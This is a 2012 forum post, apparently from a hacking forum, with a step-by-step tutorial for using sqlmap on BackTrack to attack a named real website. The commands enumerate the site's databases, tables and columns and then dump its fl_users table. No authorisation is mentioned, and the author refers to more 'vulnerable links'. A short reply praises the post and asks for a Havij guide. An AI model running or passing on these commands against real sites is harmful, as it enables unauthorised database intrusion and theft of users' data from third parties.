.Slacker Posted August 30, 2012 Report Posted August 30, 2012 The vulnerable link I’m going to use is(more vulneable link's at the end)"http://www.waterufo.net/item.php?id=200"1. Open BackTrack5 and Open a new KonsoleType the file path of sqlmap:cd /pentest/web/scanners/sqlmapNext step is../sqlmap.py -u http://www.waterufo.net/item.php?id=200 --level 5 --risk 3 --dbs(If we want to scan the full website, the syntax will be ./sqlmap.py -u Welcome to Water UFO Research Site --level 5 --risk 3 --dbs)We got information that the parameter is injectableType 'N' (I’m stopping the scan because i got one injectable parameter, if u want u can continue the scan)We got the database namesThe next step is to find the tables and columns on the database, I’m taking the database “waterufo_net”/sqlmap.py -u http://www.waterufo.net/item.php?id=200 --tables -D waterufo_netWe got all the tables in the database:Next we have to find the columns in the table fl_users/sqlmap.py -u http://www.waterufo.net/item.php?id=200 --columns -T fl_users -D waterufo_net it will display the columns on the database:to retrieve the column values type --dump at the end of the previous query:/sqlmap.py -u http://www.waterufo.net/item.php?id=200 --columns -T fl_users -D waterufo_net --dumpSursa:hakforums.net Quote
hades Posted August 30, 2012 Report Posted August 30, 2012 WOW!!! Asteptam si unul despre Havij. Keep up the good work! Quote
